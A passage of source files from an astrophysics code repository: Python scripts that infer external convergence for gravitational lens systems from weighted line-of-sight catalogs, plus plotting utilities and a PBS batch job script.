weight1_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n del weight\n weight = np.copy(weight3_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n del weight\n if (i == 0) and (j == 0):\n kappa = kappa_\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n else:\n kappa = np.append(kappa,kappa_)\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n print j,i\n\nif conjoined == 4:\n med1 = np.zeros(8)\n med2 = np.zeros(8)\n med3 = np.zeros(8)\n med4 = np.zeros(8)\n for j in range(8):\n for i in range(8):\n if weightin2 != \"gamma\":\n weight1_,weight2_,weight3_,weight4_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(weight1_index,weight2_index,weight3_index,weight4_index), unpack=True)\n if i == 0:\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n weight4 = weight4_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n weight4 = np.append(weight4,weight4_)\n else:\n weight1_,weight2_1_,weight2_2_,weight3_,weight4_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(weight1_index,1,2,weight3_index,weight4_index), unpack=True)\n if i == 0:\n weight1 = weight1_\n weight2_1 = weight2_1_\n weight2_2 = weight2_2_\n weight3 = weight3_\n weight4 = weight4_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2_1 = np.append(weight2_1,weight2_1_)\n weight2_2 = np.append(weight2_2,weight2_2_)\n weight3 = np.append(weight3,weight3_)\n weight4 = np.append(weight4,weight4_)\n print j,i\n if weightin2 != \"gamma\":\n med1[j] = np.median(weight1)\n med2[j] = np.median(weight2)\n med3[j] = np.median(weight3)\n med4[j] = np.median(weight4)\n else:\n med1[j] = np.median(weight1)\n med2[j] = np.median(np.sqrt(weight2_1**2 + weight2_2**2))\n med3[j] 
= np.median(weight3)\n med4[j] = np.median(weight4)\n med_weight1 = np.mean(med1)\n med_weight2 = np.mean(med2)\n med_weight3 = np.mean(med3)\n med_weight4 = np.mean(med4)\n if weightin2 == \"gamma\":\n constr_weight2 = constr_weight2 / med_weight2\n constrwidth_weight2_inf = constrwidth_weight2_inf / med_weight2\n constrwidth_weight2_sup = constrwidth_weight2_sup / med_weight2\n E_w1_inf = np.max([1, round(med_weight1 * (constr_weight1 - constrwidth_weight1_inf))])\n E_w1_sup = np.max([1, round(med_weight1 * (-constr_weight1 + constrwidth_weight1_sup))])\n E_w2_inf = np.max([1, round(med_weight1 * (constr_weight2 - constrwidth_weight2_inf))])\n E_w2_sup = np.max([1, round(med_weight1 * (-constr_weight2 + constrwidth_weight2_sup))])\n E_w3_inf = np.max([1, round(med_weight1 * (constr_weight3 - constrwidth_weight3_inf))])\n E_w3_sup = np.max([1, round(med_weight1 * (-constr_weight3 + constrwidth_weight3_sup))])\n E_w4_inf = np.max([1, round(med_weight1 * (constr_weight4 - constrwidth_weight4_inf))])\n E_w4_sup = np.max([1, round(med_weight1 * (-constr_weight4 + constrwidth_weight4_sup))])\n\n for j in range(8):\n for i in range(8):\n if weightin2 != \"gamma\":\n kappa_, weight1_,weight2_,weight3_,weight4_ = np.loadtxt(\"%snobeta35measured%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,filters,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index,weight2_index,weight3_index,weight4_index), unpack=True)\n weight1_ = weight1_ / med_weight1\n weight2_ = weight2_ / med_weight2\n weight3_ = weight3_ / med_weight3\n weight4_ = weight4_ / med_weight4\n else:\n kappa_, weight1_,weight3_,weight4_,gamma1_,gamma2_ = np.loadtxt(\"%snobeta35measured%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,filters,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index,weight3_index,weight4_index,2,3), unpack=True)\n gamma1 = gamma1_\n gamma2 = gamma2_\n gamma = gamma1 # just so that the array has the correct shape\n gamma = np.sqrt(gamma1**2 + gamma2**2)\n weight1_ = weight1_ / med_weight1\n weight2_ = gamma / med_weight2\n weight3_ = weight3_ / med_weight3\n weight4_ = weight4_ / med_weight4\n weight = np.copy(weight1_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight4_ = weight4_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n del weight\n weight = np.copy(weight2_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * 
med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight4_ = weight4_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n del weight\n weight = np.copy(weight3_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight4_ = weight4_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n del weight\n weight = np.copy(weight4_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight4 * med_weight1) - limsigma * E_w4_inf - increment4/2.0) & (weight * med_weight1 < round(constr_weight4 * med_weight1) + limsigma * E_w4_sup + increment4/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight4 * med_weight1) - limsigma * E_w4_inf - increment4/2.0) & (weight * med_weight1 < round(constr_weight4 * med_weight1) + limsigma * E_w4_sup + increment4/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight4 * med_weight1) - limsigma * E_w4_inf - increment4/2.0) & (weight * med_weight1 < round(constr_weight4 * med_weight1) + limsigma * E_w4_sup + increment4/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight4 * med_weight1) - limsigma * E_w4_inf - increment4/2.0) & (weight * med_weight1 < round(constr_weight4 * med_weight1) + limsigma * E_w4_sup + increment4/2.0) ]\n weight4_ = weight4_[(weight * med_weight1 >= round(constr_weight4 * med_weight1) - limsigma * E_w4_inf - increment4/2.0) & (weight * med_weight1 < round(constr_weight4 * med_weight1) + limsigma * E_w4_sup + increment4/2.0) ]\n del weight\n if (i == 0) and (j == 0):\n kappa = kappa_\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n weight4 = weight4_\n else:\n kappa = np.append(kappa,kappa_)\n weight1 = 
np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n weight4 = np.append(weight4,weight4_)\n print j,i\n\nprint(\" Read in %s seconds\" % (time.time() - start_time))\n\ngauss = sp.stats.norm(0, 1)\nstart1 = time.time()\nLOS = 0\n\nif conjoined == 4:\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1): # use as specific value\n for E2 in np.arange(-limsigma * E_w2_inf, limsigma * E_w2_sup + 1, increment2):\n for E3 in np.arange(-limsigma * E_w3_inf, limsigma * E_w3_sup + 1, increment3):\n for E4 in np.arange(-limsigma * E_w4_inf, limsigma * E_w4_sup + 1, increment4):\n print \"E1 = \", E1, \"in (\", -limsigma * E_w1_inf, \",\", limsigma * E_w1_sup, \") \", \"E2 = \", E2, \"in (\", -limsigma * E_w2_inf, \",\", limsigma * E_w2_sup, \") \", \"E3 = \", E3, \"in (\", -limsigma * E_w3_inf, \",\", limsigma * E_w3_sup, \") \", \"E4 = \", E4, \"in (\", -limsigma * E_w4_inf, \",\", limsigma * E_w4_sup, \") \" #, \"gauss_weight4 = \", gauss.pdf(float(E4)/E_w4)\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0) & (weight2 * med_weight1 >= round(constr_weight2 * med_weight1) + E2 - increment2/2.0) & (weight2 * med_weight1 < round(constr_weight2 * med_weight1) + E2 + increment2/2.0) & (weight3 * med_weight1 >= round(constr_weight3 * med_weight1) + E3 - increment3/2.0) & (weight3 * med_weight1 < round(constr_weight3 * med_weight1) + E3 + increment3/2.0) & (weight4 * med_weight1 >= round(constr_weight4 * med_weight1) + E4 - increment4/2.0) & (weight4 * med_weight1 < round(constr_weight4 * med_weight1) + E4 + increment4/2.0)] # this is equation 3 in Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf)\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n if E2 < 0: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_inf)\n else: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_sup)\n if E3 < 0: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_inf)\n else: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_sup)\n if E4 < 0: gauss_factorE4 = gauss.pdf(float(E4)/E_w4_inf)\n else: gauss_factorE4 = gauss.pdf(float(E4)/E_w4_sup)\n kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 * gauss_factorE2 * gauss_factorE3 * gauss_factorE4 / data.shape[0]\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained\n LOS = LOS + data.size\n\nif conjoined == 3:\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1):\n for E2 in np.arange(-limsigma * E_w2_inf, limsigma * E_w2_sup + 1, increment2):\n for E3 in np.arange(-limsigma * E_w3_inf, limsigma * E_w3_sup + 1, increment3):\n print \"E1 = \", E1, \"in (\", -limsigma * E_w1_inf, \",\", limsigma * E_w1_sup, \") \", \"E2 = \", E2, \"in (\", -limsigma * E_w2_inf, \",\", limsigma * E_w2_sup, \") \", \"E3 = \", E3, \"in (\", -limsigma * E_w3_inf, \",\", limsigma * E_w3_sup, \") \"#, \"gauss_weight4 = \", gauss.pdf(float(E4)/E_w4)\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0) & (weight2 * med_weight1 >= round(constr_weight2 * med_weight1) + E2 - increment2/2.0) & (weight2 * med_weight1 < round(constr_weight2 * med_weight1) + E2 + 
increment2/2.0) & (weight3 * med_weight1 >= round(constr_weight3 * med_weight1) + E3 - increment3/2.0) & (weight3 * med_weight1 < round(constr_weight3 * med_weight1) + E3 + increment3/2.0)] # this is equation 3 in Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf)\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n if E2 < 0: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_inf)\n else: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_sup)\n if E3 < 0: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_inf)\n else: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_sup)\n kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 * gauss_factorE2 * gauss_factorE3 / data.shape[0]\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained\n LOS = LOS + data.size\n\nif conjoined == 2:\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1):\n for E2 in np.arange(-limsigma * E_w2_inf, limsigma * E_w2_sup + 1, increment2):\n print \"E1 = \", E1, \"in (\", -limsigma * E_w1_inf, \",\", limsigma * E_w1_sup, \") \", \"E2 = \", E2, \"in (\", -limsigma * E_w2_inf, \",\", limsigma * E_w2_sup, \") \" #, \"gauss_weight4 = \", gauss.pdf(float(E4)/E_w4)\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0) & (weight2 * med_weight1 >= round(constr_weight2 * med_weight1) + E2 - increment2/2.0) & (weight2 * med_weight1 < round(constr_weight2 * med_weight1) + E2 + increment2/2.0)] # this is equation 3 in Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf)\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n if E2 < 0: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_inf)\n else: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_sup)\n kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 * gauss_factorE2 / data.shape[0]\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained\n LOS = LOS + data.size\n\nif conjoined == 1:\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1):\n print \"E1 = \", E1, \"in (\", -limsigma * E_w1_inf, \",\", limsigma * E_w1_sup, \") \" #, \"gauss_weight4 = \", gauss.pdf(float(E4)/E_w4)\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0)] # this is equation 3 in Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf) # for asymmetric limits, implement a gaussian on each side\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 / data.shape[0]\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained # I tested that this addition works correctly\n LOS = LOS + data.size\n\nnp.savetxt(output,unbiased_kappa_constrained,fmt='%s',delimiter='\\t',newline='\\n')\nnp.savetxt(outputLOS,np.array([LOS]),fmt='%s',delimiter='\\t',newline='\\n')\nprint(\" time for computing kappa %s 
seconds\" % (time.time() - start1))\n\nif (conjoined == 1) | (conjoined == 2) | (conjoined == 3) | (conjoined == 4):\n print \"increment1 = \", increment1\nif (conjoined == 2) | (conjoined == 3) | (conjoined == 4):\n print \"increment2 = \", increment2\nif (conjoined == 3) | (conjoined == 4):\n print \"increment3 = \", increment3\nif conjoined == 4:\n print \"increment4 = \", increment4\n\nprint(\" Total time --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.6406829953193665, "alphanum_fraction": 0.6636971235275269, "avg_line_length": 55.125, "blob_id": "c91c84f680fb973bdf2203393b4dfa0655cca788", "content_id": "13292fdcc88951631afa5ba3c391a317caf39516", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2694, "license_type": "no_license", "max_line_length": 110, "num_lines": 48, "path": "/python/plot_utilities/image_tibi.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# creates the lens montage in Berghea et al. 2017\n\nfrom astropy.io import fits\nfrom matplotlib.colors import LogNorm\nimport matplotlib.pyplot as plt\n\nplt.clf()\n\nimage_g = fits.getdata(\"/Users/eduardrusu/GITHUB/tibi/g_cut.fits\")\nimage_r = fits.getdata(\"/Users/eduardrusu/GITHUB/tibi/r_cut.fits\")\nimage_i = fits.getdata(\"/Users/eduardrusu/GITHUB/tibi/i_cut.fits\")\nimage_z = fits.getdata(\"/Users/eduardrusu/GITHUB/tibi/z_cut.fits\")\nimage_y = fits.getdata(\"/Users/eduardrusu/GITHUB/tibi/y_cut.fits\")\nimage_g_sub = fits.getdata(\"/Users/eduardrusu/GITHUB/tibi/g_sub.fits\")\nimage_r_sub = fits.getdata(\"/Users/eduardrusu/GITHUB/tibi/r_sub.fits\")\nimage_i_sub = fits.getdata(\"/Users/eduardrusu/GITHUB/tibi/i_sub.fits\")\nimage_z_sub = fits.getdata(\"/Users/eduardrusu/GITHUB/tibi/z_sub.fits\")\nimage_y_sub = fits.getdata(\"/Users/eduardrusu/GITHUB/tibi/y_sub.fits\")\nimage_i_lenssub = fits.getdata(\"/Users/eduardrusu/GITHUB/tibi/i_lenssub.fits\")\nimage_z_lenssub = fits.getdata(\"/Users/eduardrusu/GITHUB/tibi/z_lenssub.fits\")\nimage_y_lenssub = fits.getdata(\"/Users/eduardrusu/GITHUB/tibi/y_lenssub.fits\")\nfig = plt.figure(figsize=(5,3))\nax1 = fig.add_subplot(1,1,1)\nax1.set_aspect(1)\n\nfor i in range(15):\n ax1 = plt.subplot(3,5,i+1, sharex=ax1, sharey=ax1)\n ax1.axes.get_xaxis().set_visible(False)\n ax1.axes.get_yaxis().set_visible(False)\n if i == 0: plt.imshow(image_g, cmap='gray_r', origin='lower')\n if i == 1: plt.imshow(image_r, cmap='gray_r', origin='lower')\n if i == 2: plt.imshow(image_i, cmap='gray_r', origin='lower')\n if i == 3: plt.imshow(image_z, cmap='gray_r', origin='lower')\n if i == 4: plt.imshow(image_y, cmap='gray_r', origin='lower')\n if i == 5: plt.imshow(image_g_sub, cmap='gray_r', origin='lower')\n if i == 6: plt.imshow(image_r_sub, cmap='gray_r', origin='lower')\n if i == 7: plt.imshow(image_i_sub, cmap='gray_r', origin='lower')\n if i == 8: plt.imshow(image_z_sub, cmap='gray_r', origin='lower')\n if i == 9: plt.imshow(image_y_sub, cmap='gray_r', origin='lower')\n if i == 10: plt.imshow(image_g_sub, cmap='gray_r', origin='lower')\n if i == 11: plt.imshow(image_r_sub, cmap='gray_r', origin='lower')\n if i == 12: plt.imshow(image_i_lenssub, cmap='gray_r', origin='lower')\n if i == 13: plt.imshow(image_z_lenssub, cmap='gray_r', origin='lower')\n if i == 14: plt.imshow(image_y_lenssub, cmap='gray_r', origin='lower')\n\n#if i == 14: plt.imshow(image_y_lenssub, cmap='gray_r', norm=LogNorm(), origin='lower', vmin=1, vmax=10000000)\nplt.subplots_adjust(bottom=0, 
left=0, right=1, top=1, wspace=0, hspace=0)\nplt.savefig('hostlens.eps', dpi=300, bbox_inches='tight')\n" }, { "alpha_fraction": 0.6725274920463562, "alphanum_fraction": 0.7692307829856873, "avg_line_length": 24.27777862548828, "blob_id": "8cda5e7813aff90a2fc487d53a763277f2884167", "content_id": "93bdf7509527d039a0524443f752b29f76179864", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 455, "license_type": "no_license", "max_line_length": 106, "num_lines": 18, "path": "/python/scripts/NAOJ/batch_infer15.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log15.out\n#PBS -e Log15.err\n#PBS -N 15\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappa_unbiasedwithshearincrement2228.py WFI2033 5 45 23 meds gal gamma oneoverr mass3overrrms\npython inferkappa_unbiasedwithshearincrement2224.py WFI2033 5 120 23 meds gal gamma oneoverr mass3overrrms\n" }, { "alpha_fraction": 0.47222718596458435, "alphanum_fraction": 0.5808179974555969, "avg_line_length": 51.82075500488281, "blob_id": "81201b656a0aa59d73e7e65ce71794a6f4fd879a", "content_id": "a42e5a681a190043c1e4209f4c8f91421352118b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5599, "license_type": "no_license", "max_line_length": 252, "num_lines": 106, "path": "/python/plot_utilities/kappa_scaledstdchoiceplot.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# uses the output of kappa_medsigsim.py to decide the weight-based combination\n\nimport numpy as np\nimport matplotlib\n#matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nfile = \"/Users/cerusu/OneDrive - Subaru Telescope/WFI2033kappasims/scaledstdchoiceplot.dat\"\nnames = np.genfromtxt(file,usecols=[0],dtype='S200')\ndata = np.loadtxt(file,usecols=[1,2,3,4,5,6,19,20],dtype='d,d,d,d,d,d,f,f',unpack=True)\nmedofstd,rmsofstd = data[6],data[7]\nN = len(data[0])\nlos = np.zeros(N)\n\nfor i in range(N):\n los[i] = np.log10(np.median([data[0][i],data[1][i],data[2][i],data[3][i],data[4][i],data[5][i]]))\n trim = np.char.find(names[i], '+22.5')\n names[i] = names[i][:trim]\n\nind = 1 * np.arange(N) # the x locations for the groups\nwidth = 0.9 # the width of the bars\n\nax = plt.subplot(2,1,1)\n#ax.set(aspect=15)\ncol1 = los\nrects1 = ax.bar(ind + width, col1, width,color='gray')\n#ax.set_ylim([0,7])\nax.set_xlim([0.5,N+0.5])\nax.set_ylabel('log(No. 
of LOS)',fontsize=14)\nax.set_xticks(ind + width)\nax.set_xticklabels([])\nplt.title('Relative scaled widths of selected $\\kappa_{ext}^{med}-\\kappa_{true}$ distributions',fontsize=18)\n\nax = plt.subplot(2,1,2)\n#ax.set(aspect=15)\ncol2 = medofstd\ncol2err = rmsofstd\nrects2 = ax.bar(ind + width, col2, width, yerr=rmsofstd,color='gray')\n#ax.set_ylim([0,1.3])\nax.set_xlim([0.5,N+0.5])\nax.set_ylabel('scaled std($\\kappa_{ext}^{med} - \\kappa_{true}$)',fontsize=14)\n#ax.set_ylabel('$\\sigma_{\\kappa_\\mathrm{med} - \\kappa_\\mathrm{true}}$')\nax.set_xticks(ind + width)\nax.set_xticklabels(names, fontsize=8, rotation='vertical')\n#ax.set_aspect(.0)\n#w, h = figaspect(2.)\n#fig = Figure(figsize=(w, h))\nfsannotate=14\nplt.plot([0,N],[1,1],linewidth=1, color='k', linestyle='--')\nwidth = 0.35*2\nax.annotate('1', xy=(1./N-0.0025, -0.82), xytext=(1./N-0.0025, -0.92), xycoords='axes fraction',\n fontsize=fsannotate, ha='center', va='bottom'\n #,bbox=dict(boxstyle='square', fc='white')\n ,arrowprops=dict(arrowstyle='-[, widthB=%f, lengthB=13.2' %width, lw=1.0)\n )\nwidth = 0.35*(5-0.5)\nax.annotate('2', xy=(1./N-0.0025+(1./N+5.0/(2*N))+0.0015, -0.82), xytext=(1./N-0.0025+(1./N+5.0/(2*N))+0.0015, -0.92), xycoords='axes fraction',\n fontsize=fsannotate, ha='center', va='bottom'\n #,bbox=dict(boxstyle='square', fc='white')\n ,arrowprops=dict(arrowstyle='-[, widthB=%f, lengthB=13.2' %width, lw=1.0)\n )\nwidth = 0.35*(8-0.7)\nax.annotate('3', xy=(1./N-0.0025+(1./N+5.0/(1*N))+8.0/(2*N)+0.000, -0.82), xytext=(1./N-0.0025+(1./N+5.0/(1*N))+8.0/(2*N)+0.000, -0.92), xycoords='axes fraction',\n fontsize=fsannotate, ha='center', va='bottom'\n #,bbox=dict(boxstyle='square', fc='white')\n ,arrowprops=dict(arrowstyle='-[, widthB=%f, lengthB=13.2' %width, lw=1.0)\n )\nwidth = 0.35*4-0.1\nax.annotate('4', xy=(1./N-0.0025+(1./N+13.0/N)+4.0/(2*N), -0.82), xytext=(1./N-0.0025+(1./N+13.0/N)+4.0/(2*N), -0.92), xycoords='axes fraction',\n fontsize=fsannotate, ha='center', va='bottom'\n #,bbox=dict(boxstyle='square', fc='white')\n ,arrowprops=dict(arrowstyle='-[, widthB=%f, lengthB=13.2' %width, lw=1.0)\n )\nwidth = 0.35*1-0.1\nax.annotate('5', xy=(1./(1*N)-0.0025+13.0/(1*N)+5.0/(1*N)+1.0/(2*N), -0.82), xytext=(1./(1*N)-0.0025+13.0/(1*N)+5.0/(1*N)+1.0/(2*N), -0.92), xycoords='axes fraction',\n fontsize=fsannotate, ha='center', va='bottom'\n #,bbox=dict(boxstyle='square', fc='white')\n ,arrowprops=dict(arrowstyle='-[, widthB=%f, lengthB=13.2' %width, lw=1.0)\n )\nwidth = 0.35*11-0.2\nax.annotate('6', xy=(1./(1*N)-0.0025+13.0/(1*N)+5.0/(1*N)+1.0/(1*N)+11.0/(2*N), -0.82), xytext=(1./(1*N)-0.0025+13.0/(1*N)+5.0/(1*N)+1.0/(1*N)+11.0/(2*N), -0.92), xycoords='axes fraction',\n fontsize=fsannotate, ha='center', va='bottom'\n #,bbox=dict(boxstyle='square', fc='white')\n ,arrowprops=dict(arrowstyle='-[, widthB=%f, lengthB=13.2' %width, lw=1.0)\n )\nwidth = 0.35*6-0.2\nax.annotate('7', xy=(1./(1*N)-0.0025+13.0/(1*N)+5.0/(1*N)+1.0/(1*N)+11.0/(1*N)+6.0/(2*N), -0.82), xytext=(1./(1*N)-0.0025+13.0/(1*N)+5.0/(1*N)+1.0/(1*N)+11.0/(1*N)+6.0/(2*N), -0.92), xycoords='axes fraction',\n fontsize=fsannotate, ha='center', va='bottom'\n #,bbox=dict(boxstyle='square', fc='white')\n ,arrowprops=dict(arrowstyle='-[, widthB=%f, 